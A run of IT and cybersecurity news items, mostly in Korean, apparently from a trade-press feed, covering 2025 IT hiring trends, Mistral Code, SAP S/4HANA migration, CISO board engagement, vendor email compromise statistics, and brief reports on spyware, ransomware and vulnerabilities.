2025년에도 IT 업계는 데이터, 보안, 엔지니어링 분야를 중심으로 숙련된 인재 확보에 총력을 기울이고 있다. 전문가들은 소프트웨어 엔지니어링, 사이버보안, 데이터 관리 분야에서 우수 인재 확보 경쟁이 한층 심화될 것으로 내다봤다. 특히 기업들은 실무 경험과 유연성을 갖춘 인재를 선호하고 있으며, 변화에 대한 적응력을 핵심 자질로 꼽고 있다. AI 기술이 IT 업계 전반에 걸쳐 화두로 떠오른 가운데, 델로이트는 최근 보고서에서 MIT의 경제학자 대런 아세모글루의 분석을 인용해 “향후 10년 동안 AI 자동화로 사라질 일자리는 전체의 5%에 불과할 것”이라고 전망했다. AI의 신뢰성 문제와 인간의 판단이 여전히 필요한 업무가 많기 때문이다. 그러나 일부 IT 전문가들은 AI 기술이 자신들의 역량을 무력화시킬 수 있다는 불안감을 여전히 갖고 있다. 이와 동시에 AI 전환을 이끄는 역할을 수행하는 IT 직무의 수요는 급증하고 있다. 델로이트 보고서는 또 하나의 변화를 지적한다. 과거에는 비용 절감과 자동화 확대를 중심으로 기술 투자 전략이 수립됐지만, 이제는 기술을 통해 조직 전반의 장기적 가치를 창출하려는 채용 전략이 중요해졌다는 것이다. 다음은 2025년 현재 IT 조직 내에서 높은 비즈니스 가치를 창출하고 혁신을 주도하고 있는 주요 직무들이다. 수요 증가와 더불어 보상도 높은 직무들이다. 데이터 엔지니어 AI를 조직의 일상 업무에 통합하는 기업이 늘면서 데이터 엔지니어 수요도 급증하고 있다. 소프트웨어 아웃소싱 기업 바이어스데브(BairesDev)에서 인재 영입 부문을 총괄하는 에세키엘 루이스는 “2024년 한 해 동안 데이터 관련 채용 수요가 77% 증가했다”고 설명했다. 루이스는 “모든 산업 분야에서 AI 도입을 위해 데이터 전문가를 찾고 있다”라며 “수요 증가 속도가 매우 빠르다”고 전했다. 오라일리 미디어(O’Reilly Media)에서 신기술 콘텐츠 부문을 총괄하는 마이크 루카이디스 역시 AI 성공을 위해 데이터 과학의 중요성을 강조했다. 그는 “자신의 데이터가 가진 강점과 약점을 파악하고, 더 나은 데이터를 확보할 수 있는 방법을 아는 사람이 필요하다”며 “AI의 결과물이 기대에 부합하는지 검토하는 평가 작업, 이른바 ‘이밸(eval, evaluation의 줄임말로, AI 업계에서는 AI 모델의 성능을 평가하고 검증하는 작업 전반)’가 요즘 가장 뜨거운 주제 중 하나”라고 말했다. 사이버보안 전문가 사이버 공격이 날로 정교해짐에 따라 시스템 보안 관리자와 정보보안 분석가 등 관련 직무의 채용 수요가 급증하고 있다. 특히 AI 기반 공격의 확산은 보안 직무를 2025년 최고 연봉 직종 중 하나로 만들고 있다. 넥서스 IT 그룹(Nexus IT Group)의 매니징 디렉터인 트래비스 린드모엔은 “기업들이 윤리적 해커와 침투 테스터 채용을 확대하고 있다”고 말했다. 그는 “이제 수세적 방어는 효과가 없다”며 “공격자들은 자동화된 피싱, 변화무쌍한 악성코드, 서비스형 랜섬웨어 같은 수단을 사용하고 있다. 기업들은 이제 능동적인 보안 역량, 즉 시스템을 사전에 스트레스 테스트할 수 있는 역량이 필요하다”고 설명했다. 린드모엔은 특히 클라우드 보안과 윤리적 해킹 분야에서 실무 경험을 갖춘 인재를 찾기 어렵다는 점에서 글로벌 사이버보안 인력 부족은 기업에 심각한 리스크라고 지적했다. 루카이디스 역시 “대부분의 기업이 과거보다는 보안에 더 많은 투자를 하고 있지만, 여전히 보안은 큰 도전 과제”라며 “특히 AI가 공격 도구로 사용되거나 공격 대상으로 떠오르면서 문제는 더욱 복잡해지고 있다”고 진단했다. 플랫폼 엔지니어 델로이트의 휴먼캐피털 서비스 리더 네이트 페인터는 플랫폼 엔지니어에 대한 수요가 증가하고 있다고 전했다. 이들은 다른 엔지니어가 사용할 수 있는 기능과 플랫폼을 구축하고 통합하는 역할을 맡는다. 플랫폼 엔지니어링은 일부 선도 조직에서 IT 부문의 핵심 역할로 부상하고 있다. 페인터는 “플랫폼 엔지니어는 전체 플랫폼을 관리하며 비즈니스 솔루션 개발을 위한 기반을 제공한다”며 “현재 인프라 분야가 전성기를 맞고 있다”고 언급했다. 호스팅 기업 벌처(Vultr)의 최고마케팅책임자 케빈 코크레인은 “소프트웨어 개발과 배포를 보다 효율적이고 일관되며 확장 가능하게 만들 수 있는 플랫폼 엔지니어의 수요가 더욱 커질 것”이라고 분석했다. 그는 “가트너는 2026년까지 전체 소프트웨어 엔지니어링 조직의 80%가 내부 플랫폼 엔지니어링 팀을 구성해 애플리케이션 전달을 지원할 구성요소와 도구를 제공할 것으로 예측하고 있다”며 “이러한 팀은 소프트웨어 전달을 더 빠르고 쉽고 안전하게 만드는 역할을 한다”라고 설명했다. 그린테크 전문가 지속가능성을 중심으로 한 채용은 앞으로도 계속 확대될 전망이다. 점점 더 많은 기업이 환경 목표를 비즈니스 전략과 연계하면서, 에너지 효율 향상, 연결된 기기 관리, 넷제로(Net Zero) 달성 등을 지원할 수 있는 IT 인재에 대한 수요가 꾸준히 이어지고 있다. 델로이트의 페인터는 “데이터 관리에 드는 막대한 비용이 이러한 역할 수요를 주도하고 있다”며 “그린테크 플랫폼 엔지니어 같은 직무가 주목받는 것은 놀라운 일이 아니다. 다만, 이러한 역할이 데이터 엔지니어 역할에 통합되는 경우도 많다”고 설명했다. IT 채용 서비스 업체 VIQU IT 리크루트먼트의 설립자이자 대표인 매트 콜링우드는 수요가 높은 직무로 IoT 개발자와 지속가능성 중심의 클라우드 아키텍트를 꼽았다. 그는 “기술 업계 구조조정과 경기 침체에도 불구하고 그린에너지 분야 전문가에 대한 수요는 꾸준히 증가하고 있다”라며 “그린테크가 곧 수요의 중심”이라고 전했다. 프로덕트 매니저 기술 솔루션이 고객과 비즈니스의 요구를 충족하도록 이끄는 핵심 역할로서 프로덕트 매니저의 중요성은 여전히 높다. 특히 최근 기업들이 전통적인 IT 프로젝트보다 제품 중심의 IT 전략을 채택하면서 그 역할이 더욱 부각되고 있다. 델로이트의 페인터는 “2025년에는 기술 자체가 비즈니스가 되는 시대”라며 “혁신을 이끄는 프로덕트 매니저가 필요하다”고 강조했다. 이 직무는 점점 더 최고경영진의 관심을 받는 영역으로 성장하고 있으며, 현대의 프로덕트 매니저는 제품 수명 주기에 대한 깊은 이해, 명확한 커뮤니케이션 역량, 그리고 조직의 목표를 뒷받침하는 비즈니스 기획 능력을 갖춰야 한다. 페인터는 “최근에는 이 직무에서 요구되는 역량도 변하고 있다”며 “기초적인 인간적 역량에 대한 중요성이 커지고 있고, 동료를 설득할 수 있는 영향력이 요구된다”고 분석했다. 소프트웨어 엔지니어 소프트웨어 엔지니어는 여전히 IT 업계에서 가장 핵심적이면서도 충원하기 어려운 직무 중 하나로 꼽힌다. AI, 네트워킹, 클라우드 환경 등 주요 분야 전반에서 수요가 견고하게 유지되고 있다. 델로이트의 페인터는 “완전히 새로운 직무보다는 기존 소프트웨어 개발 직무가 점차 세분화되고 특화되고 있다”며 “AI 엔지니어와 네트워크 엔지니어, 일반 클라우드 엔지니어와 클라우드 네이티브 전문가 등으로 분화되고 있다”고 전했다. 오라일리 미디어의 루카이디스는 “기술 업계에 구조조정이 있었음에도 여전히 프로그래머는 필요하다”라며 “지금은 AI를 잘 다룰 줄 아는 인재가 더욱 요구되는 시기”라고 말했다. 그는 이어 “단순한 문제는 아니다. AI 역시 입력이 쓰레기면 출력도 쓰레기다. 자연어 프롬프트가 어설프게 작성되면 형편없는 코드만큼이나 쓸모없다”라고 덧붙였다. 클라우드 및 데브옵스 엔지니어 클라우드 전환은 대부분의 기업에 여전히 최우선 과제이며, 이를 지원하고 최적화하며 자동화할 수 있는 엔지니어에 대한 수요는 지속적으로 증가하고 있다. 클라우드 아키텍트와 데브옵스 엔지니어는 시스템 운영, 애플리케이션 배포 간소화, 안정적인 운영을 책임지는 핵심 인력이다. 넥서스 IT 그룹의 린드모엔은 “클라우드 아키텍트는 최대 19만 4,000달러의 연봉을 받을 수 있으며, 데브옵스 엔지니어에 대한 수요는 전년 대비 24% 증가했다”고 설명했다. 인포테크 리서치 그룹(Info-Tech Research Group)의 연구 책임자 브리태니 루츠는 “클라우드 아키텍트는 보안 분석가, 데이터·AI 엔지니어와 함께 가장 많이 채용되는 기술 직무 중 하나”라며 “이들 직무는 채용이 가장 어려운 분야이기도 하며, 올해도 많은 조직이 인력 확보에 큰 어려움을 겪을 것으로 보인다”라고 전망했다. 루카이디스는 일부에서 클라우드 리패트리이션(데이터센터 회귀)에 대한 논의가 나오고 있지만, 실제로는 여전히 클라우드로의 이동이 지속되고 있다고 밝혔다. 그는 “특히 AI는 클라우드 도입을 더욱 가속화하고 있다”며 “대규모 AI를 실행할 수 있는 온프레미스 데이터센터 구축은 현실적으로 어렵기 때문에, 클라우드 환경에서 애플리케이션을 배포·운영할 수 있는 인력이 계속 필요하다. 클라우드는 현대 인프라의 필수 요소”라고 설명했다. IT 솔루션 업체 카세야(Kaseya)에서 글로벌 채용을 총괄하는 에릭 룬드 역시 자사와 업계 전반에서 데브옵스 직무가 매우 인기 있는 채용 분야로 남아 있다고 밝혔다. 그는 “데브옵스는 지난해 우리 조직에서 가장 수요가 높은 직무였으며, 향후에도 중요성이 커질 것으로 본다”며 “AI 자동화와 함께 역할이 진화하겠지만, 여전히 가장 주목받는 분야일 것”이라고 전했다. 역량을 쌓고 변화를 수용하자 IT 커리어를 시작하는 신입 인재에게 전문가들은 기술 변화에 맞춰 새로운 역량을 습득하고 이를 유연하게 적용할 수 있는 태도가 성공의 열쇠라고 조언한다 핀테크 기업 애비드익스체인지(AvidXchange)의 최고정보책임자(CIO)인 안젤릭 M. 깁슨은 “현재 수요가 높다고 해서 특정 경로에 얽매일 필요는 없다”라며 “IT 전반에서 미래를 형성하는 영역을 중심으로 문을 열어줄 수 있는 견고한 기반을 쌓는 데 집중해야 한다”라고 강조했다. 깁슨은 파이썬, 자바, 자바스크립트 등 널리 사용되는 프로그래밍 언어와 주요 클라우드 플랫폼에 대한 실무 경험을 쌓을 것을 추천했다. 또한 AWS 공인 솔루션스 아키텍트(AWS Certified Solutions Architect), 공인 윤리적 해커(Certified Ethical Hacker), 구글 데이터 엔지니어(Google Data Engineer), 마이크로소프트 애저 클라우드(Azure cloud) 등의 자격증도 실무에 바로 투입될 수 있는 능력을 증명하는 데 도움이 된다고 조언했다. 신기술 기반의 기회에 대해 오라일리의 루카이디스는 AI와의 상호작용 방식을 개선할 필요성을 제기했다. 그는 “챗GPT가 등장한 이후 AI의 적절한 인터페이스는 채팅이라는 전제가 굳어졌다”라며 “하지만 이는 반드시 옳은 가정이 아니다. 현재 인터페이스는 모두 단일 사용자 중심이지만, 실제 업무는 대부분 팀 기반으로 이뤄진다. AI를 위한 새로운 사용자 인터페이스를 설계하는 일은 이제 막 시작된 흥미로운 영역”이라고 설명했다. 바이어스데브의 루이스는 커리어 선택을 단순한 시장 수요에만 기반해선 안 된다고 지적했다. 그는 “커리어 선택은 수요뿐 아니라 열정의 문제이기도 하다”며 “개인적으로는 파이썬을 추천한다. 이는 소프트웨어 개발, 데이터 과학, AI 등 다양한 분야로의 확장을 가능하게 한다. 결국 수요와 흥미가 교차하는 지점을 찾는 것이 장기적인 성공의 비결”이라고 강조했다. 인포테크 리서치 그룹의 루츠는 “서비스 데스크나 데스크톱 테크니션 같은 신입 직무가 점점 줄어들고 있다”고 언급하며, 커리어 초기에는 자격증 취득에 그치지 말고 학습한 내용을 실제에 적용할 수 있는 실력을 보여줘야 한다고 조언했다. 루츠는 “오늘날 많이 사용되는 기술 역량이 18개월 후에도 유효하다는 보장은 없다”라며 “특정 역량에만 집중하기보다는 새로운 도구를 배우고 이를 다양한 영역에 적용할 수 있는 적응력을 갖추는 것이 중요하다”라고 강조했다.dl-ciokorea@foundryco.com

The investigation into the collapse of the Assad regime reveals a significant technical dimension, particularly a spyware application named STFD-686 that was distributed among Syrian army officers via Telegram. This is a fascinating story where Android SpyMax spyware was able to exfiltrate sensitive data from solders smartphones and played a part in taking over the […] The post Analysis of Spyware That Helped to Compromise a Syrian Army from Within first appeared on Mobile Hacker.

미스트랄 코드는 보안과 컴플라이언스를 중시하는 대기업 환경을 대상으로 한 AI 코딩 어시스턴트로, AI 모델, IDE 내 어시스턴트, 로컬 배포 옵션, 엔터프라이즈용 툴링을 하나의 패키지로 통합한 것이 특징이다. 기반 기술은 오픈소스 AI 코딩 도구인 ‘컨티뉴(Continue)’를 활용했다. 현재 젯브레인IDE와 VS코드용 비공개 베타 버전으로 이 기술을 체험할 수 있으며, 정식 출시는 곧 이뤄질 예정이다. 미스트랄은 고객사 인터뷰를 통해 기존 SaaS 기반 AI 코딩 도구들의 한계를 파악했고, 이를 해결하기 위한 도구로 미스트랄 코드를 개발했다고 밝혔다. 기본 AI 코딩 도구의 주요 문제점으로는 ▲사내 리포지토리 및 내부 서비스와의 연결 제약 ▲모델 또는 프롬프트 커스터마이징의 어려움 ▲자동완성에 그치는 제한된 작업 범위 ▲모델, 플러그인, 인프라에 걸친 분산된 SLA 관리 문제 등을 꼽았다. 미스트랄은 공식 블로그를 통해 “미스트랄 코드 같은 단일 솔루션으로 모델, 플러그인, 관리자 제어 기능, 24시간 지원을 통합 제공하여 고객은 AI 도입 효과를 보다 명확히 파악할 수 있을 것”라며 “미스트랄 코드는 자체 코딩 전용 AI 모델을 제공하고, 즉각적인 자동완성부터 복잡한 리팩토링까지 지원하는 통합 플랫폼으로 클라우드, 전용 리소스, 또는 온프렘 GPU 환경 어디든 배포할 수 있다”라고 밝혔다. 미스트랄 코드는 각각 다른 용도에 특화된 4개의 AI 모델을 활용한다. 여기에는 코드 자동완성을 담당하는 ‘코데스트랄(Codestral)’, 코드 검색을 위한 ‘코데스트랄 임베드(Codestral Embed)’, 에이전트 기반 코딩을 수행하는 ‘데브스트랄(Devstral)’, 그리고 채팅 지원용 ‘미스트랄 미디엄(Mistral Medium)’이다. 미스트랄 코드는 또한 80개 이상의 프로그래밍 언어를 지원하며, 파일 분석, 깃 변경사항 추적, 터미널 출력 해석, 이슈 처리 등 복합적인 작업을 수행할 수 있다. 이때 기본 코드 제안을 넘어 파일 열기, 새 모듈 작성, 테스트 업데이트, 셸 명령 실행까지 포함한 문의 처리가 가능하다는 게 미스트랄의 설명이다. 미스트랄에 따르면, 프랑스 국영철도공사 SNCF는 4,000명의 개발자를 위해 미스트랄 코드 서버리스를 도입했으며, 글로벌 시스템 통합업체 캡제미니(Capgemini)도 미스트랄 코드를 온프레미스 환경에 적용해 1,500명 이상의 개발자에게 제공하고 있다.jihyun.lee@foundryco.com

SAP가 지난달 미국 플로리다에서 개최한 연례 컨퍼런스 ‘사파이어(Sapphire)’에서는 통합 비즈니스 제품군(Business Suite)과 생성형 AI 에이전트 ‘줄(Joule)’에 대한 내용이 강조됐다. 하지만 주력 ERP 솔루션인 S/4HANA로의 고객사 전환 현황은 거의 언급되지 않았다. SAP 경영진은 기존 ERP 시스템인 ECC에서 S/4HANA로의 전환을 얼마나 이끌었는지에 대한 진척 상황을 공개하지 않았다. 많은 고객에게 ECC의 기술지원 종료 시점이 2027년 말로 다가오고 있음에도 불구하고 구체적인 설명은 없었다. 가트너(Gartner)의 기술 및 서비스 공급자 부문 부사장 파비오 디 카푸아는 “SAP 경영진이 전환 현황에 대해 언급을 피한 것은 놀랍지 않다”라고 말했다. 그는 “회의적인 분석가로서 벤더가 수치를 공개하지 않는다면 결과가 좋지 않다는 의미로 받아들인다. 결과가 좋았다면 ‘우리가 해냈다’라며 먼저 소리쳤을 것”이라고 설명했다. 수치로 보는 S/4HANA 도입 현황 가트너에 따르면 2024년 말 기준 SAP ECC 고객사 약 3만 5,000곳 중 39%(약 1만 4,000곳)만 S/4HANA로 전환을 마친 것으로 나타났다. 이 추세가 이어질 경우 2027년까지 1만 7,000곳, 즉 전체의 절반에 가까운 고객사가 여전히 ECC를 사용할 것으로 전망된다. 또한 가트너는 2030년까지도 ECC를 사용하는 기업이 1만 3,000곳 이상일 것이라고 예상했다. IDC 엔터프라이즈 소프트웨어 부문 부사장 미키 노스 리자는 이보다 낙관적으로 전망했지만 차이는 크지 않았다. 그는 2027년까지 ECC 고객의 40~45%가 여전히 해당 솔루션을 유지할 것이라고 내다봤다. SAP는 2015년 말 S/4HANA를 처음 출시했으며, 2021년 1월에는 ‘라이즈(RISE)’ 전환 프로그램도 선보였다. 하지만 디 카푸아는 기업의 전환 속도가 꾸준하되 느리다고 지적했다. 또한 SAP는 2023년 3월에 중기업 대상의 ‘그로우(GROW)’ 프로그램도 출시한 바 있다. 디 카푸아는 “SAP가 고객을 라이즈로 전환시키려 할 때, 우리는 ‘수년간 절반도 설득하지 못했는데, 나머지를 5년 안에 어떻게 전환시킬 계획인가’라고 물었다”라고 언급했다. 그는 ECC 시스템의 복잡성, 특히 맞춤형으로 설계된 시스템 규모와 마이그레이션 비용을 2가지 주요 걸림돌로 지적했다. 일부 프로젝트는 200만 달러 수준에서 진행되지만, 대기업의 복잡한 시스템은 최대 10억 달러에 이를 수 있다는 설명이다. 디 카푸아는 가트너가 고객사와 3~7년에 걸친 전환 프로젝트를 수행해 왔다며, 단순한 시스템 이전이 아닌 전면적인 업무 프로세스 재설계와 변화 관리 체계 수립이 필요한 경우가 많다고 설명했다. 일부 기업은 추가적으로 인사(HCM)나 조달 솔루션까지 도입해야 하는 상황에 직면해 있다고 덧붙였다. 서드파티 지원 업체 많은 SAP 고객사가 ECC에 대해 외부 벤더의 기술 지원을 검토하거나, SAP가 지원 종료 시점을 또다시 연장할 것을 기대하고 있다. 실제로 SAP는 과거에도 일정을 여러 차례 늦춘 전례가 있다. SAP는 지난 2월 새로운 전환 옵션인 ‘SAP ERP 프라이빗 에디션 전환 옵션(SAP ERP, private edition, transition option)’을 발표하기도 했다. 이는 일부 대형 고객사를 대상으로 ECC 사용을 2033년까지 연장할 수 있도록 허용한다. 일부 SAP 고객사들은 ERP의 특정 기능을 외부 벤더를 통해 보완하는 방식을 택하고 있다. 디 카푸아는 특히 인사, 조달, 공급망 관리 기능에 대해 서드파티 솔루션을 도입하는 사례가 늘고 있다고 설명했다. IDC의 노스 리자는 고객들의 어려움을 인식한 SAP가 지원 종료 시점을 연장하고 새로운 전환 도구를 도입한 점은 높이 평가할 만하다고 언급했다. 그는 “SAP는 고객사가 어디에서 어려움을 겪고 있는지를 인식하기 시작했다. 기존 제품군에서 새로운 제품군으로 전체 조직을 한꺼번에 마이그레이션하기가 어렵다는 점이 그중 하나였다”라고 말했다. 이어 “SAP는 고객이 전환 과정을 이해하고 실행할 수 있도록 지원하는 경로를 만들려 하고 있다”라고 설명했다. SAP “수요 높고 클라우드 전환도 순조롭다” SAP는 자사 제품과 클라우드 서비스, 특히 S/4HANA의 클라우드 버전에 대한 수요가 높아지고 있다고 밝혔다. SAP 아메리카 및 글로벌 비즈니스 제품군 사장 겸 최고수익책임자(CRO) 얀 길크는 2025년 1분기 SAP의 클라우드 매출이 지난해 동기 대비 약 26% 증가했다고 설명했다. 버스타인리서치(Bernstein Research)의 전무 겸 수석 애널리스트 마크 모어들러는 신규 클라우드 고객의 3분의 2가 완전히 새로운 고객이라는 점이 SAP에 긍정적인 신호라고 분석했다. 한편 길크는 SAP 고객이 ERP 기능을 외부 벤더의 솔루션으로 대체하고 있다는 디 카푸아의 지적에 반박했다. 그는 “오히려 생성형 AI 시대에는 독립적인 업무별 애플리케이션이 점점 의미를 잃고 있다. 클라우드 덕분에 데이터 접근 방식이 완전히 바뀌었고, 통합된 클라우드 솔루션 제품군에 대한 고객 수요가 커지고 있다”라고 밝혔다. 이와 관련해 IBM을 포함한 여러 기업은 S/4HANA로의 전환이 가져온 실질적인 효과를 언급했다. IBM의 경우 지난해 7월 SAP 클라우드 ERP 플랫폼으로 전환한 후 인프라 관련 운영 비용이 30% 감소했다고 밝혔다. 그럼에도 불구하고 애널리스트들은 SAP가 남은 ECC 고객을 설득하는 과정이 험난할 수 있다고 내다봤다. 포레스터(Forrester)의 엔터프라이즈 앱 및 서비스 부문 수석 애널리스트 악샤라 나이크 로페즈는 SAP가 클라우드 기반 서비스로 유도하는 과정에서 일부 ECC 고객이 이미 하이퍼스케일러와 체결한 계약을 이유로 전환을 주저하고 있다고 말했다. 그는 “많은 기업들이 다양한 애플리케이션을 사용하고 있으며, 이를 AWS나 애저(Azure) 같은 플랫폼으로 이전해 속도를 높이고 있다”라며 “대규모 클라우드 계약을 체결한 상태인 만큼, 고객들은 그 계약을 활용해 S/4HANA를 하이퍼스케일러 위에서 호스팅하길 원하고 있다”라고 분석했다. 또한 나이크 로페즈는 고객들의 불만이 커지면서 SAP가 지난해 2분기부터 대규모 할인 정책을 도입했다며, 이런 정책에 불구하고 2027년 이후에 전체 ECC 고객의 40% 이상이 기존 ERP를 사용할 가능성이 있다고 전망했다. 특히 정기적인 버전 업데이트와 기타 수정 사항을 꾸준히 적용해 온 경우, 전환 압박을 거의 느끼지 않는 것으로 보인다고 그는 진단했다. 그는 “이들 기업에 물어보면 ‘우리의 ECC 환경은 매우 견고하고 안정적이다’라고 답할 것”이라며 “SAP의 기술 지원이 종료된다고 해서 시스템이 갑자기 멈추거나, 과거에 없던 문제가 새롭게 발생하는 것은 아니다. 환경은 예전과 똑같이 작동할 것”이라고 강조했다.dl-ciokorea@foundryco.com

The Interlock ransomware gang has claimed a recent cyberattack on the Kettering Health healthcare network and leaked data allegedly stolen from breached systems.

Adequate time with the board is in short supply for CISOs and this restricted engagement is leaving organizations unprepared to fully understand and manage enterprise risk. Time for the cybersecurity agenda is often limited to quarterly board committee sessions and annual full boards meetings, according to an Advanced Cyber Security Center report. In practice, this means most CISOs are only given a 15 to 45-minute slot on a crowded agenda in a board risk, audit or technology committee meeting and similar time at the board’s annual meeting. “Cyber usually starts off on the calendar being an hour, and then it gets squished down to a half hour, and then sometimes you’re lucky if it’s 15 minutes, which is just horrendous,” says George Gerchow, faculty at IANS Research and Bedrock Security’s CSO. Cybersecurity is boxed into operational or compliance updates, keeping it separate and distinct from broader business strategy and risk management. “At some public companies, it will most likely get attention from the audit committee and probably very little time with the actual board itself,” says Gerchow. “The thing about the audit committee is that they care about compliance and it’s not really a cybersecurity risk discussion,” he says. Adding to the challenges, boards often lack the tools, context or structure to challenge and influence cyber strategy effectively. Because of this and the reduced time allowed to CISOs, boards end up just receiving reports rather than valuable feedback. Boards need to be well-versed in cyber risks, this means treating cybersecurity as a strategic business risk, not an isolated technical issue. What sometimes drives board interaction is a security incident, says Gerchow. “Then the questions are ‘Why? Why did we wait until it got to this point?’” Dedicated board time means open discussions about cyber risks Keeping cybersecurity as a separate agenda item means organizations aren’t automatically considering one of their greatest risks in overall strategic business reviews, according to the ACSC. The problem is the limited time allocated to CISOs in audit committee meetings is not sufficient for comprehensive cybersecurity discussions. Increasingly, more time is needed for conversations around managing the complex risk landscape. In previous CISO roles, Gerchow had a similar cadence, with quarterly time with the security committee and quarterly time with the board. He also had closed door sessions with only board members. “Anyone who’s an employee of the company, even the CEO, has to drop off the call or leave the room, so it’s just you with the board or the director of the board,” he tells CSO. He found these particularly important for enabling frank conversations, which might centre on budget, roadblocks to new security implementations or whether he and his team are getting enough time to implement security programs. “They may ask: ‘How are things really going? Are you getting the support you need?’ It’s a transparent conversation without the other executives of the company being present.” Gerchow found it a valuable opportunity to discuss things openly without regard for lines of responsibility or other impediments to frank conversations. “I’m one who’ll speak my mind, but I know other CISOs won’t in a regular board meeting with the CEO, the CFO or whomever they report to. They’re more likely to stick with progress made against risks.” The full partnership model between CISO and board Full and frank security discussions are more than just a ‘nice to have’. The SEC has indicated it expects public companies with senior leadership to be transparent in how they assess and communicate cybersecurity risks. By extension, CISOs have an important role in communicating risks to senior leadership and the board. To provide strategic insights, CISOs need to avoid excessive technical details and instead use consistent frameworks, risk registers, and resilience metrics. At Liberty Mutual, cybersecurity is reported to the board as both a standalone topic and as part of broader technology strategy discussions. “There’s value in reporting to the full board so that all directors have some exposure to cyber trends and the health of the cybersecurity program,” says Liberty Mutual CISO Katie Jenkins. Jenkins finds both approaches valuable, with the standalone conversation narrowing in on risks and mitigation strategies, while the integration into technology discussions demonstrates that security is not an isolated function. “Effective security outcomes depend on a cross-functional commitment across the organization,” she says. “When I present to the board, my goals are to educate on current trends and emerging threats, clarify risks — avoiding both underrepresentation and overrepresentation — and instill confidence that we allocate our resources effectively to align with those risks.” Jenkins aims to develop a “dialogue over a monologue” to understand the board’s most pressing questions and tailor her presentation to provide greater clarity or incorporate relevant examples in line with their focus. To do so, Jenkins is guided by three principles in her presentations. Firstly, be clear about relating risks to business impact to make the issues more tangible and relevant to board members. “When discussing incidents or risks, I connect them to their potential impact on business operations. Use demonstrations to show threats in action. This provides clarity and helps build trust, moving beyond “just trust me on this” to show real-time examples of our efforts. “In a recent board update, I used demos to show the ease of use of toolkits favored by adversaries and showcased the before-and-after effects of implementing specific security controls.” Finally, Jenkins also makes a point of highlighting how security is also a driver of innovation. “I emphasize how security enables innovation by providing guardrails, which serves as a nice complement to the more defensive aspects of our work.” Shifting away from purely committee reporting isn’t just a tactical move. It reflects the growing need to have CISOs provide input into many business initiatives. Jenkins believes CISOs can offer valuable input into AI adoption, operational resilience, technology modernization, data and digital transformation, mergers and acquisitions, supplier and procurement strategies, and geopolitical risk management. “Our contributions extend beyond just cybersecurity incidents; we also play a vital role in enterprise risk management and crisis response,” she says.

Exposure of sensitive information to an unauthorized actor in Power Automate allows an unauthorized attacker to elevate privileges over a network.

Researchers have come up with a fix for a path traversal bug first spotted in 2010 A security bug that surfaced fifteen years ago in a public post on GitHub has survived developers' attempts on its life.

The U.S. Department of State has announced a reward of up to $10 million for any information on government-sponsored hackers with ties to the RedLine infostealer malware operation and its suspected creator, Russian national Maxim Alexandrovich Rudometov.

이메일 보안 기업 애브노멀AI(Abnormal AI)는 최근 보고서를 통해 VEC 공격이 기술적 취약점이 아닌 사람의 신뢰를 악용하는 방식으로 기존 방어 체계를 뚫고 있다고 진단했다. 보고서에 따르면 대기업 직원의 72%가 링크나 첨부 파일이 없는 사기성 벤더 이메일에 응답하거나 전달한 경험이 있는 것으로 나타났다. VEC 공격은 지난 1년간 전 세계적으로 3억 달러 이상의 도난 시도를 유발했으며, 기존의 BEC(Business Email Compromise)보다 90% 더 높은 참여율을 보였다. 보고서는 특히 유럽·중동·아프리카(EMEA) 지역이 특히 위협에 직면해 있다고 분석했다. EMEA 지역 직원들은 VEC 이메일과 가장 많이 상호 작용했지만, 해당 사기 이메일을 보고한 비율은 0.27%에 불과해 전 세계에서 가장 낮은 신고율을 기록했다. 가장 취약한 산업군은 통신 분야로 직원의 71.3%가 VEC 이메일에 반응했으며, 에너지 및 유틸리티 산업군이 56.25%로 그 뒤를 이었다. 애브노멀AI의 CIO 마이크 브리튼은 “이메일 기반의 사회공학적 공격이 그 어느 때보다 정교하고 효과적”이라며 “공격자는 합법적인 벤더 이메일 대화 스레드를 탈취해 정교하게 위장한 메시지를 생성하고, 이를 통해 기존 방어체계를 피해간다. 직원들이 해당 이메일을 진짜라고 믿는 만큼 응답률이 놀라울 정도로 높다”라고 설명했다. 보고서는 EMEA 지역 내에서도 특히 영업팀의 신입 직원이 VEC 이메일의 86%에 반응해 가장 위험한 상황이라고 분석했다. 해당 지역에서 일반적인 BEC 공격은 기업이 4.22%를 탐지하고 신고하는 데 비해, VEC 공격은 98.5%가 신고되지 않은 채 재무 손실이 발생한 이후에야 발견되는 경우가 많았다. 이는 아시아 태평양(APAC) 지역에서 BEC가 여전히 주요 위협으로 작용하며, 44.4%의 직원 참여율을 보인 것과는 대조적이다. QKS그룹의 애널리스트 수짓 두발은 “생성형 AI의 등장으로 VEC 공격의 정밀도가 매우 정밀하고 치밀하게 진화했다”라며 “이제는 누구나 알아차릴 수 있는 피싱 메일이 아닌, 다단계 인증과 다양한 보안 조치를 우회하는 고도로 정제된 비즈니스 커뮤니케이션”이라고 평가했다. AI가 공격 복잡성 증폭 전통적인 피싱과 달리 VEC 공격은 실제 기업 이메일 스레드를 모방하는 방식으로 이뤄진다. 공격자는 AI를 이용해 이메일의 어조, 브랜드, 대화 기록을 정밀하게 재현한다. 탐지 시스템이 인식할 만한 징후가 없어 필터를 쉽게 우회하며, 심지어 신중한 직원들조차 속일 수 있다. 특히 인재 시장이 위축된 상황에서 직원들이 지급 지연 등의 문제를 빠르게 해결하려다 이런 이메일에 쉽게 반응하는 경향이 나타나고 있다. 두발은 “다단계 인증 같은 기존 보안 수단이 이러한 AI 기반 공격에는 효과를 발휘하지 못하고 있다”라며 “단순히 계정 자격 증명 검증을 넘어, 심리적 조작까지 대응할 수 있는 보안 전략 전환이 필요하다”라고 강조했다. 또한 그는 “AI 기반 VEC 공격은 기존의 경계 보안만으로는 차단할 수 없다”며, 조직이 세 가지 핵심 대응 체계를 도입해야 한다고 강조했다. 구체적으로는 “미세한 이상 징후를 감지할 수 있는 AI 기반 이메일 분석 시스템, 실시간 벤더 검증 절차, 기술적 위협뿐 아니라 사회공학적 수법까지 인지할 수 있도록 재교육받은 직원이 필요하다”라고 설명했다. VEC 공격의 전체 발생 건수는 피싱이나 랜섬웨어보다 적지만, 성공률과 재무적 피해 가능성은 훨씬 더 크다. 브리튼은 “무기화된 AI는 신뢰받는 벤더를 흉내 내는 과정을 그 어느 때보다 쉽게 만든다. 수동적인 보안 교육에서 벗어나, 이메일이 받은편지함에 도달하기 전에 위협을 차단할 수 있는 선제적 방어 전략을 도입해야 한다”라고 조언했다.dl-ciokorea@foundryco.com

The United Nations, Carnegie Mellon University, and private organizations are all aiming to train the next generation of cybersecurity experts, boost economies, and disrupt pipelines to armed groups.

